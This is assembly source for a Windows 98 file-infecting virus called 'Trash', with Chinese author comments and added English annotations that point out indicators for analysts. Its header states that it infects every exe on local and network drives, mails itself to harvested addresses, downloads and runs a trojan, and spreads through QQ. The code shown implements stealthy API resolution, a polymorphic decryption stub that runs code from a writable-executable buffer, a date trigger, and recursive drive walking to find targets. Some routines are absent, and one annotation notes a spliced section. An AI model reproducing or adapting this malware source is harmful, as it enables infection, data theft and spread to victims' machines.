;***************************************************************
; 名 称:Trash
; 测试平台:Win98/masmV7.0
;
; 申明:本文仅作技术研究,否则后果自负
;注:
;
;编译命令行:
; ml /c /coff poly.asm
; link /subsystem:windows /section:.text,rew poly.obj
;***************************************************************
;;简 介:
;1. 感染本地硬盘和网络上所有exe(GUI)文件
;2. 搜索本地所有邮件地址,将病毒作为附件发送出去
;3. 从网上下载木马程序并运行。
;4. 利用QQ散播消息。
;*************************************************
;工作流程:
;1.首先得到重定位信息,保存在ebx中.
;2.调用GetKBase ,得到Kernel32.dll的基地址。
;3.调用GetAPIz,得到程序将使用的Kernel32中所有API.
;4.判断是被感染文件还是自身.如是被感染文件则分配空间并动态产生解密模块,然后解密程序代码。
; 否则直接到5
;5. 调用DownloadFile下载木马程序
;6. 调用RunExe执行木马程序
;7.调用DownloadFile下载邮件体hello.eml文件
;8. 启动发送QQ消息线程
;9. 感染本地Exe文件
;***************************************************
.386
.Model Flat, StdCall
Option Casemap :None
;___________________________________________________________________________
include d:\masm32\useful.inc
.code
;-----------------------------------------------------------------------
; Host stub and virus entry (annotated for analysis).
; Main/Msgbox is the dropper's own benign host body; VStart is the entry
; used once the body has been appended to another executable.  Every
; variable below is addressed as name[ebx], where ebx holds the load delta
; computed at Start.  Flag, hMem, hKernel32 and the _Api slots live in
; .code and are written at runtime -- that is why the link line in the file
; header marks .text "rew"; a writable+executable code section is a static
; indicator worth flagging on any sample.
;-----------------------------------------------------------------------
Main:
Flag dd 45678h                          ; marker: still 45678h in the original dropper; an infected host carries a different value
szCaption db "ShowTime",0
szText db "Good luck!",0
Msgbox:
invoke MessageBox,NULL,addr szText,addr szCaption,MB_OK
invoke ExitProcess,NULL
VStart:
call Start                              ; pushes the runtime address of Start (used only as a relocation reference)
Start:
pop ebx ;runtime position of the virus body inside the host
sub ebx , offset Start                  ; ebx = runtime address - link-time address (delta for all name[ebx] accesses)
call GetKBase ;locate the KERNEL32.DLL image base
jnz VStar
jz VStar
db 0e9h ;junk byte: one of the two jumps above is always taken, so this opaque JMP opcode is never executed (anti-disassembly)
VStar:
call GetAPIz;resolve the addresses of the APIs the code uses
mov eax,offset Msgbox
.if Flag!=45678h;first run (original dropper): no transformation needed
Next1:
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT
push VirusLen
push NULL
call _VirtualAlloc[ebx]                 ; VirtualAlloc(NULL, VirusLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
mov hMem[ebx],eax
lea esi,[offset Load+ebx]               ; esi -> encrypted body (Load is defined outside this listing)
mov edi,hMem[ebx]                       ; edi -> the fresh RWX buffer
mov ecx,EncryptLen/4                    ; dword count handed to the engine
push ebx
call Metamorphosize                     ; writes a decryptor + body into the buffer (defined outside this listing)
pop ebx
push ebx
call hMem[ebx]                          ; execute the buffer just written: allocate-RWX / write / call pattern (behavioural indicator)
pop ebx
.endif
call Load                               ; defined outside this listing
;**********locate the base address of the kernel32.dll image*****************
; In:  [esp+4] = the dword above the return address, i.e. the address the
;      host entry point was called from.  The author presumes it lies
;      inside kernel32 (true on the Win9x platform named in the header; on
;      later Windows versions the entry is reached from ntdll, so this
;      heuristic is not expected to work there).
; Out: edi = image base, also stored in hKernel32[ebx].
; Walks downward in 64 KB steps looking for an MZ header whose e_lfanew
; points at a PE signature.  No exception handler is visible in this
; listing, so touching an unmapped 64 KB page would fault.
; Clobbers esi, edi, flags.
GetKBase:
mov edi , [esp+04h]
and edi , 0FFFF0000h                    ; round down to a 64 KB boundary (image bases are 64 KB aligned)
.while TRUE
.if WORD ptr [edi] == IMAGE_DOS_SIGNATURE ;is this an MZ header?
mov esi, edi
add esi, DWORD ptr [esi+03Ch] ;esi -> PE signature (e_lfanew at offset 3Ch)
.if DWORD ptr [esi] ==IMAGE_NT_SIGNATURE;is the PE signature present?
.break;yes: this is the image base, leave the loop
.endif
.endif
sub edi, 010000h                        ; step back one 64 KB page
.if edi < MIN_KERNEL_SEARCH_BASE ;below the search floor (constant defined outside this listing): win9x fallback
mov edi, 0bff70000h ;0BFF70000h = hard-coded kernel32 base on Win9x
.break
.endif
.endw
mov hKernel32[ebx],edi;save the KERNEL32.DLL base that was found
ret
;-----------------------------------------------------------------------
; Resolve GetProcAddress and LoadLibraryA by walking the kernel32 export
; table by name.  No import table is involved, so the imports of an
; infected file reveal nothing about these calls; the two name scans and
; the later _GetProcAddress[ebx] calls are the behaviour to look for.
; In:  edi = kernel32 image base (left in edi by GetKBase), ebx = delta.
; Out: _GetProcAddress[ebx] and _LoadLibraryA[ebx] filled in;
;      hKernel32[ebx] overwritten with the handle returned by LoadLibraryA.
; Clobbers eax, ecx, edx, esi, edi, ebp, flags (ebp is a scratch pointer,
; not a frame pointer).  No ret: execution falls through into GetOApiz.
;-----------------------------------------------------------------------
GetAPIz:
push edi
mov edx,edi ;edx -> KERNEL32 image base
assume edx :ptr IMAGE_DOS_HEADER
add edx,[edx].e_lfanew
assume edx:ptr IMAGE_NT_HEADERS
mov edx,[edx].OptionalHeader.DataDirectory.VirtualAddress ; first DataDirectory entry = export directory RVA
add edx,hKernel32[ebx];EDX -> KERNEL32 export directory
assume edx:ptr IMAGE_EXPORT_DIRECTORY
push edx
mov ebp,[edx].AddressOfNames
add ebp,hKernel32[ebx] ;ebp -> array of exported-name RVAs
push ebp                                ; saved so the second scan can restart from the first name
xor eax,eax ;eax = index into the name table
.repeat
push 14 ;length of the name "GetProcAddress"
pop ecx
mov edi,[ebp]
add edi,hKernel32[ebx]
lea esi,[offset nGetProcAddress+ebx]
repz cmpsb;does the i-th exported name equal "GetProcAddress"? (14 bytes compared, terminator not checked)
.if zero?
.break ;match: leave with eax = index of the name
.endif
add ebp,4 ;next name RVA
inc eax ;next index
.until eax == [edx].NumberOfNames ;[edx].NumberOfNames = number of exported names
mov ebp, [edx].AddressOfNameOrdinals ;16-bit ordinal table parallel to AddressOfNames
add ebp, hKernel32[ebx]
movzx ecx, word ptr [ebp+eax*2] ;ordinal of GetProcAddress
mov ebp, [edx].AddressOfFunctions ;[edx].AddressOfFunctions -> array of function RVAs
add ebp, hKernel32[ebx]
mov eax, [ebp+ecx*4]
add eax,hKernel32[ebx];eax = address of GetProcAddress
mov _GetProcAddress[ebx],eax
pop ebp                                 ; ebp -> first name RVA again
pop edx                                 ; edx -> export directory again
pop edi
xor eax,eax ;eax = index into the name table
.repeat
push 12 ;length of the name "LoadLibraryA"
pop ecx
mov edi,[ebp]
add edi,hKernel32[ebx]
lea esi,[offset nLoadLibraryA+ebx]
repz cmpsb;does the i-th exported name equal "LoadLibraryA"? (12 bytes compared, terminator not checked)
.if zero?
.break ;match: leave with eax = index of the name
.endif
add ebp,4 ;next name RVA
inc eax ;next index
.until eax == [edx].NumberOfNames ;[edx].NumberOfNames = number of exported names
mov ebp, [edx].AddressOfNameOrdinals ;16-bit ordinal table parallel to AddressOfNames
add ebp, hKernel32[ebx]
movzx ecx, word ptr [ebp+eax*2] ;ordinal of LoadLibraryA
mov ebp, [edx].AddressOfFunctions ;[edx].AddressOfFunctions -> array of function RVAs
add ebp, hKernel32[ebx]
mov eax, [ebp+ecx*4]
add eax,hKernel32[ebx];eax = address of LoadLibraryA
mov _LoadLibraryA[ebx],eax
lea eax,[offset nKernel+ebx]            ; nKernel is a string defined outside this listing
push eax
call _LoadLibraryA[ebx]
mov DWORD ptr hKernel32[ebx],eax        ; from here on hKernel32 holds the module handle, not the scanned base
GetOApiz:
call @api_table
db "LoadLibraryA",0
db "CreateThread",0
db "CreateRemoteThread",0
db "WinExec",0
db "CreateMutexA",0
db "OpenMutexA",0
db "ReleaseMutex",0
db "FindFirstFileA",0
db "FindNextFileA",0
db "FindClose",0
db "CreateFileA",0
db "CreateFileMappingA",0
db "MapViewOfFile",0
db "UnmapViewOfFile",0
db "SetFilePointer",0
db "ReadFile",0
db "GetComputerNameA",0
db "WriteFile",0
db "CloseHandle",0
db "VirtualAlloc",0
db "VirtualAllocEx",0
db "WriteProcessMemory",0
db "VirtualFree",0
db "VirtualFreeEx",0
db "lstrcmpi",0
db "lstrcpy",0
db "lstrcat",0
db "lstrlen",0
db "GetFileSize",0
db "GetSystemDirectoryA",0
db "GetModuleFileNameA",0
db "Sleep",0
db "GetSystemTime",0
db "DeleteFileA",0
db "OpenProcess",0
db "GetModuleHandleA",0
db "GetCurrentDirectoryA",0
db "SetCurrentDirectoryA",0
db "ExitProcess",0
db "GetExitCodeThread",0
db "ResumeThread",0
@api_table:
pop edi
call @api_dest
K_Apiz:
_LoadLibraryA dd 0
_CreateThread dd 0
_CreateRemoteThread dd 0
_WinExec dd 0
_CreateMutex dd 0
_OpenMutex dd 0
_ReleaseMutex dd 0
_FindFirstFile dd 0
_FindNextFile dd 0
_FindClose dd 0
_CreateFile dd 0
_CreateFileMapping dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_SetFilePointer dd 0
_ReadFile dd 0
_GetComputerNameA dd 0
_WriteFile dd 0
_CloseHandle dd 0
_VirtualAlloc dd 0
_VirtualAllocEx dd 0
_WriteProcessMemory dd 0
_VirtualFree dd 0
_VirtualFreeEx dd 0
_lstrcmpi dd 0
_lstrcpy dd 0
_lstrcat dd 0
_lstrlen dd 0
_GetFileSize dd 0
_GetSystemDirectory dd 0
_GetModuleFileNameA dd 0
_Sleep dd 0
_GetSystemTime dd 0
_DeleteFile dd 0
_OpenProcess dd 0
_GetModuleHandleA dd 0
_GetCurrentDirectoryA dd 0
_SetCurrentDirectoryA dd 0
_ExitProcess dd 0
_GetExitCodeThread dd 0
_ResumeThread dd 0
K_API_NUM = ($-K_Apiz)/4 ;病毒中用到的API函数的个数
@api_dest:
pop esi ;esi为存放找到的函数地址数组的首址
push K_API_NUM
pop ecx
xor ebp,ebp
K_begin:
push ecx
push edi ;edi上面定义的函数名数组的首地址
push hKernel32[ebx]
call _GetProcAddress[ebx]
or eax,eax
jz GA_Fail
;mov edx , DWORD ptr [esi+ebp]
mov dword ptr [esi],eax
GA_Fail:
xor eax,eax
repnz scasb ;寻找字符串结束标志0,使edi指向下个函数名
add esi,4
pop ecx
loop K_begin
call szWsock32
db "Wsock32.dll",0
hSock dd 0
szWsock32:
call _LoadLibraryA[ebx]
mov hSock[ebx],eax
SockApis:
call SockTable
db "WSAStartup",0
db "socket",0
db "htons",0
db "inet_addr",0
db "connect",0
db "send",0
db "closesocket",0
db "WSACleanup",0
db "gethostbyname",0
SockTable:
pop edi
call SockDest
S_Apiz:
_WSAStartup dd 0
_socket dd 0
_htons dd 0
_inet_addr dd 0
_connect dd 0
_send dd 0
_closesocket dd 0
_WSACleanup dd 0
_gethostbyname dd 0
S_ApiNum=($-S_Apiz)/4
SockDest:
pop esi ;esi为存放找到的函数地址数组的首址
push S_ApiNum
pop ecx
xor ebp,ebp
S_begin:
push ecx
push edi ;edi上面定义的函数名数组的首地址
push hSock[ebx]
call _GetProcAddress[ebx]
or eax,eax
jz G_Fail
;mov edx , DWORD ptr [esi+ebp]
mov dword ptr [esi],eax
G_Fail:
xor eax,eax
repnz scasb ;寻找字符串结束标志0,使edi指向下个函数名
add esi,4
pop ecx
loop S_begin
call szUser32
db "User32.dll",0
szFindWindowA db "FindWindowA",0
szFindWindowExA db "FindWindowExA",0
szSendMessageA db "SendMessageA",0
szChildWindowFromPointEx db "ChildWindowFromPointEx",0
_FindWindowA dd 0
_FindWindowExA dd 0
_SendMessageA dd 0
_ChildWindowFromPointEx dd 0
szUser32:
call _LoadLibraryA[ebx]
push esi
mov esi,eax
call szwsprintfA
db "wsprintfA",0
_wsprintf dd 0
szwsprintfA:
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _wsprintf[ebx],eax
lea ecx,[offset szFindWindowA+ebx]
push ecx
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _FindWindowA[ebx],eax
lea ecx,[offset szFindWindowExA+ebx]
push ecx
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _FindWindowExA[ebx],eax
lea ecx,[offset szSendMessageA+ebx]
push ecx
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _SendMessageA[ebx],eax
lea ecx,[offset szChildWindowFromPointEx+ebx]
push ecx
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _ChildWindowFromPointEx[ebx],eax
pop esi
ret
;Metamorphic engine, as described by the author:
; the transformed code consists of two parts:
; 1) a block of code XOR-encrypted with a 32-bit key
; 2) a decryptor for that block, generated at random by the engine
;Three of the seven general registers are chosen at random as the index,
;key and counter registers, and 1..3 junk instructions are inserted between
;consecutive effective instructions of the decryptor.
EAX_REG = 0                             ; x86 register numbers (the 3-bit reg field of the opcode/ModRM encoding)
ECX_REG = 1
EDX_REG = 2
EBX_REG = 3
ESP_REG = 4
EBP_REG = 5
ESI_REG = 6
EDI_REG = 7
INDEX_REG = 0                           ; slot indices for the roles given to the randomly chosen registers
KEY_REG = 1
COUNT_REG = 2
FREE_REG1 = 3                           ; remaining slots -- presumably the registers left over for junk code; the table they index is not in this listing
FREE_REG2 = 4
FREE_REG3 = 5
FREE_REG4 = 6
;-----------------------------------------------------------------------
; Random: edx = (low 32 bits of the time-stamp counter) mod [esp+4]
; In:  one dword argument on the stack (the modulus), removed by ret 4.
; Out: edx = value in [0, modulus); eax preserved.
; The bytes 0Fh 31h are the RDTSC opcode written as data -- read them as
; rdtsc (edx:eax = TSC).  A modulus of 0 would raise #DE; the visible
; caller pushes 3.  Clobbers edx, flags.
;-----------------------------------------------------------------------
Random:
push eax
db 0Fh, 031h ;rdtsc: eax = low TSC dword (the raw "random" value)
xor edx, edx                            ; clear the high dword before the 32-bit unsigned divide
div dword ptr [esp+8];eax / modulus ([esp+8]: above the saved eax and the return address); remainder in edx
pop eax
ret 4
;-----------------------------------------------------------------------
; routine1: emit the opcode byte of "mov r32, imm32" into the output buffer.
; In:  edi = output pointer; [ebx+ecx] = register number for this
;      instruction (ecx presumably holds the link-time address of a
;      register-selection table entry -- the table is not in this listing).
; Out: one byte written, edi advanced by 1.  Clobbers dl, flags.
;-----------------------------------------------------------------------
routine1:
mov byte ptr [edi], 0B8h ;0B8h = MOV EAX,imm32, 0B9h = MOV ECX,imm32, ... (opcode base + register number)
mov dl, byte ptr [ebx+ecx]
add [edi], dl                           ; select the register encoding
inc edi
ret
;generate junk code (as labelled; see note)
; NOTE(review): only the first four instructions fit the label (draw a
; count of 1..3 via Random).  From @PL1 on the code reads a SYSTEMTIME and
; tests the day of the month, which is a payload trigger, not code
; generation -- the listing looks spliced or truncated here and the
; junk-generation body itself is not present.  The dword pushed on entry
; (eax) is left on the stack as GetSystemTime's single stdcall argument,
; so the callee removes it and the stack is balanced at ret.
; ShowTime, the payload, is an empty stub in this listing.
GenerateGarbabyCode:
push eax
push 3 ;modulus: decides how many junk instructions are produced
call Random ;
lea ecx, [edx+1] ;ecx = 1..3
@PL1: mov esi,[esp] ;esi = the dword pushed on entry, used as the SYSTEMTIME buffer pointer (assumed to be supplied in eax by the caller)
call _GetSystemTime[ebx]
;fetch the current system time
movzx eax , word ptr [esi+6] ;[esi+6] = SYSTEMTIME.wDay
cmp ax,14h ;is it the 20th?
jnz PL_Exit
KILL: ;trigger date reached: run the payload
call ShowTime
PL_Exit:
ret
ShowTime:
ret
;************InfectDisk***********************
;Walk the local drives: starting from the letter currently in DirName[0]
;(the caller's writable string, first byte = drive letter), call EnumDir for
;each drive, bump the letter, and stop once it passes "z"; finally reset the
;letter to "c".  Every letter in the range is tried whether or not the drive
;exists -- EnumDir is left to cope with a missing drive.
; In:  DirName = pointer to the drive string (modified in place),
;      FileType = pattern passed straight through to EnumDir.
; Clobbers eax.
;*********************************************
EnumDisk PROC DirName : DWORD,FileType : DWORD
.REPEAT
push FileType
push DirName
call EnumDir                            ; EnumDir(DirName, FileType)
mov eax,DirName
inc byte ptr [eax]                      ; next drive letter
mov al,byte ptr[eax]
.UNTIL al > "z"
mov byte ptr [eax] , "c"                ; restore the string for the next call
ret 8
EnumDisk ENDP
;************EnumDir************
;遍历DirName,寻找FileType类型文件
;*******************************
EnumDir PROC DirName : DWORD ,FileType:DWORD
LOCAL hSearch : DWORD
LOCAL DirorFile[MAX_PATH] : DWORD
pushad
push DirName
lea esi,DirorFile
push esi
call _lstrcpy[ebx]
@pushsz "\*.*"
push esi ;DirorFile
call _lstrcat[ebx]
lea edi,[offset wfd+ebx]
push edi
push esi
call _FindFirstFile[ebx]
cmp eax,INVALID_HANDLE_VALUE
jz ED_Exit
mov hSearch,eax
.REPEAT
.if byte ptr [wfd+44+ebx]==".";wfd.cFilename
jmp short EN_NEXT
.endif
push DirName
push esi
call _lstrcpy[ebx]
@pushsz "\"
push esi
call _lstrcat[ebx]
lea eax,[wfd+44+ebx]
push eax
push esi ;DirorFile
call _lstrcat[ebx]
mov eax , dword ptr [wfd+ebx]
and eax , FILE_ATTRIBUTE_DIRECTORY
.if eax ==FILE_ATTRIBUTE_DIRECTORY
push dword ptr FileType
push esi
call EnumDir
.else ;是文件
push dword ptr FileType
push esi
call AnFile
.endif